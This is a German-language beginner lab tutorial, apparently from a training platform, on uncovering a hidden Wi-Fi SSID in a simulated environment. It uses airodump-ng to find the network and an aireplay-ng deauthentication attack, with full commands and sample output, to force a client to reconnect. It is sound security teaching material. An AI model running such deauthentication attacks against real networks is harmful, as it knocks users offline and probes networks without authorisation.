Versteckte SSID mit airodump-ng entdecken

Beginner
Jetzt üben

Einleitung

Drahtlose Netzwerke können so konfiguriert werden, dass sie ihre Service Set Identifier (SSID) nicht übertragen, wodurch sie "versteckt" werden. Obwohl dies eine geringfügige Verschleierung bietet, ist es keine robuste Sicherheitsmaßnahme. Ein Angreifer kann die SSID immer noch mit Tools zur Netzwerkanalyse aufdecken.

In diesem Lab lernen Sie den Prozess der Entdeckung einer versteckten SSID. Sie verwenden airodump-ng, um den drahtlosen Datenverkehr zu überwachen und ein verstecktes Netzwerk zu identifizieren, und dann aireplay-ng, um einen Deauthentifizierungsangriff durchzuführen. Dieser Angriff zwingt einen verbundenen Client, sich kurzzeitig zu trennen und dann wieder zu verbinden, wodurch die SSID des Netzwerks während des Re-Assoziationsprozesses preisgegeben wird.

Wir werden in einer simulierten drahtlosen Umgebung arbeiten, die für dieses Lab vorbereitet wurde.

Starten von airodump-ng im allgemeinen Scan-Modus

In diesem Schritt starten Sie airodump-ng, ein Werkzeug zur Erfassung von 802.11-Frames. Wir werden es verwenden, um nach allen umliegenden drahtlosen Netzwerken zu suchen. Die Laborumgebung wurde mit einer Überwachungsschnittstelle namens wlan2mon eingerichtet.

Öffnen Sie zuerst ein Terminal. Alle Befehle in diesem Lab werden im Terminal ausgeführt.

Führen Sie nun airodump-ng auf der Überwachungsschnittstelle aus. Dies erfordert sudo-Berechtigungen.

sudo airodump-ng wlan2mon

Nachdem Sie den Befehl ausgeführt haben, wird Ihr Terminal mit Informationen über umliegende WLAN-Netzwerke gefüllt. Lassen Sie diesen Befehl weiterlaufen, da wir seine Ausgabe in den nächsten Schritten beobachten werden.

Sie sollten eine Anzeige ähnlich dieser sehen, die sich in Echtzeit aktualisiert:

CH  6 ][ Elapsed: 10 s ][ 2023-10-27 10:00

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 XX:XX:XX:XX:XX:XX  -30       10        0    0   6  54e  OPN              <length:  0>

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Halten Sie dieses Terminal offen und lassen Sie airodump-ng laufen. Sie müssen ein neues Terminal für die Befehle in Schritt 4 öffnen.

Identifizieren eines Netzwerks mit einer ESSID '<length 0>'

In diesem Schritt analysieren Sie die Ausgabe von airodump-ng, um das versteckte Netzwerk zu finden.

Betrachten Sie das Terminal, in dem airodump-ng läuft. Versteckte Netzwerke werden durch eine nicht übertragene ESSID (Netzwerkname) identifiziert. airodump-ng zeigt dies als <length: 0> an.

In der Ausgabe sollten Sie eine Zeile ähnlich dieser sehen:

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 XX:XX:XX:XX:XX:XX  -30       10        0    0   6  54e  OPN              <length:  0>

Diese Zeile repräsentiert unser Ziel-Netzwerk, das versteckt ist. Notieren Sie sich zwei wichtige Informationen aus dieser Zeile:

  • BSSID: Die MAC-Adresse des Access Points. Im Beispiel ist es XX:XX:XX:XX:XX:XX.
  • CH: Der Kanal, auf dem das Netzwerk betrieben wird. Im Beispiel ist es 6.

Sie benötigen die BSSID für den Deauthentifizierungsangriff in einem späteren Schritt. Zu Ihrer Bequemlichkeit in diesem Lab wurde die BSSID des simulierten AP in einer Datei gespeichert. Sie können sie bei Bedarf anzeigen, indem Sie cat /tmp/bssid.txt in einem neuen Terminal ausführen.

Warten auf die Verbindung eines Clients, um die SSID aufzudecken

In diesem Schritt besprechen wir die passive Methode zur Entdeckung einer versteckten SSID.

Eine Möglichkeit, die SSID zu entdecken, besteht darin, einfach zu warten. Wenn sich ein legitimer Client mit dem versteckten Netzwerk verbindet, sendet er Probe-Requests und Association-Requests, die die SSID enthalten. Wenn airodump-ng läuft und auf dem richtigen Kanal lauscht, erfasst es diese Pakete und zeigt die SSID an.

Die Ausgabe von airodump-ng zeigt zwei Abschnitte. Der obere Abschnitt listet Access Points (APs) auf, und der untere Abschnitt listet verbundene Clients (Stations) auf.

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 XX:XX:XX:XX:XX:XX  -30       10        0    0   6  54e  OPN              <length:  0>

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 XX:XX:XX:XX:XX:XX  YY:YY:YY:YY:YY:YY  -40    0- 1      0        1

Im obigen Beispiel ist ein Client mit der MAC-Adresse YY:YY:YY:YY:YY:YY mit unserem versteckten AP (XX:XX:XX:XX:XX:XX) verbunden.

Das Warten auf die Verbindung eines Clients kann jedoch sehr lange dauern. Im nächsten Schritt werden wir eine aktive Methode verwenden, um die Angelegenheit zu erzwingen und die SSID viel schneller aufzudecken.

Erzwingen eines Deauthentifizierungsangriffs zur Aufdeckung der SSID

In diesem Schritt werden wir die SSID mithilfe eines Deauthentifizierungsangriffs mit aireplay-ng aktiv aufdecken. Dieser Angriff sendet spezielle Pakete an einen verbundenen Client, wodurch dieser die Verbindung zum Netzwerk trennt. Ein gut funktionierender Client versucht dann sofort, die Verbindung wiederherzustellen, und während dieses Wiederverbindungshandshakes wird die SSID aufgedeckt.

Zuerst müssen Sie ein neues Terminal öffnen. Schließen Sie nicht das Terminal, in dem airodump-ng läuft.

Im neuen Terminal erstellen Sie den aireplay-ng-Befehl. Das Befehlsformat lautet: sudo aireplay-ng --deauth <number_of_packets> -a <AP_BSSID> <interface>

  • --deauth 5: Wir senden 5 Deauthentifizierungs-Pakete.
  • -a <AP_BSSID>: Dies ist die BSSID des versteckten Netzwerks, das Sie in Schritt 2 identifiziert haben.
  • wlan2mon: Dies ist unsere Monitoring-Schnittstelle (interface).

Um es einfach zu machen, können Sie die BSSID aus der vorbereiteten Datei abrufen. Führen Sie diesen Befehl aus, um den Angriff zu starten:

sudo aireplay-ng --deauth 5 -a $(cat /tmp/bssid.txt) wlan2mon

Sie sehen eine Ausgabe, die darauf hinweist, dass die Deauthentifizierungs-Pakete gesendet werden.

10:05:10  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
10:05:10  Sending 64 directed DeAuths. STMAC: [YY:YY:YY:YY:YY:YY] [ 0|63 ACKs]
...

Wechseln Sie nun schnell zurück zu Ihrem ersten Terminal, in dem airodump-ng läuft, um das Ergebnis im nächsten Schritt zu beobachten.

Beachten Sie die aufgedeckte SSID in der airodump-ng-Anzeige

In diesem letzten Schritt beobachten Sie die Ergebnisse des Deauthentifizierungsangriffs.

Wechseln Sie zurück zu Ihrem ersten Terminal, dem, in dem airodump-ng ausgeführt wurde. Nach dem Deauthentifizierungsangriff hat sich der Client wieder mit dem Access Point verbunden. Während dieses Prozesses hat airodump-ng die SSID erfasst.

Die Zeile, die zuvor <length: 0> für die ESSID anzeigte, sollte nun den tatsächlichen Netzwerknamen, LabExHidden, anzeigen.

Vor dem Angriff:

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 XX:XX:XX:XX:XX:XX  -30       10        0    0   6  54e  OPN              <length:  0>

Nach dem Angriff:

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 XX:XX:XX:XX:XX:XX  -32       25        1    0   6  54e  OPN              LabExHidden

Sie haben erfolgreich die SSID des versteckten Netzwerks entdeckt!

Sie können nun beide Terminals schließen, indem Sie exit eingeben oder Strg+C verwenden, um zuerst die laufenden Prozesse zu stoppen.

Zusammenfassung

In diesem Lab haben Sie eine praktische Technik zur Entdeckung versteckter WLAN-Netzwerke kennengelernt. Sie haben gesehen, dass das Verstecken einer SSID keine effektive Sicherheitsmaßnahme ist, da sie leicht aufgedeckt werden kann.

Sie haben die wichtigsten Werkzeuge aus der aircrack-ng-Suite geübt:

  • airodump-ng: Zum Scannen von drahtlosen Netzwerken und zur Identifizierung eines versteckten Netzwerks anhand seiner <length: 0> ESSID.
  • aireplay-ng: Zur Durchführung eines Deauthentifizierungsangriffs, der einen verbundenen Client zwingt, die SSID bei der Wiederverbindung preiszugeben.

Dieser Prozess der passiven Überwachung, gefolgt von einem aktiven Angriff, ist ein grundlegendes Konzept bei der Überprüfung der drahtlosen Sicherheit.